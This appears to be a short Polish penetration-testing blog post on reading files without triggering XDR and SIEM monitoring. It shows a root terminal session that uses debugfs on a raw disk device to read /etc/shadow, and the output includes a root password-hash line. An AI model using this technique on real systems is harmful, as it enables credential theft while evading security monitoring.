NFsec Logo

Alternatywne otwieranie plików pod radarem XDR i SIEM

11/12/2022 w Pen Test Brak komentarzy.  (artykuł nr 839, ilość słów: 21)

root@darkstar:~# debugfs
debugfs 1.44.1 (24-Mar-2018)
debugfs:  open /dev/vda1
debugfs:  cd /etc
debugfs:  cat shadow
root:$6$HeeGzA.awU7P35OuN6GbBHl7yAwIDmelemelekIiaGLVYA8/hNKI1:19290:0:99999:7:::

Więcej informacji: 0xm1rch

Kategorie K a t e g o r i e : Pen Test

Tagi T a g i : , , , , , , , ,

Komentowanie tego wpisu jest zablokowane.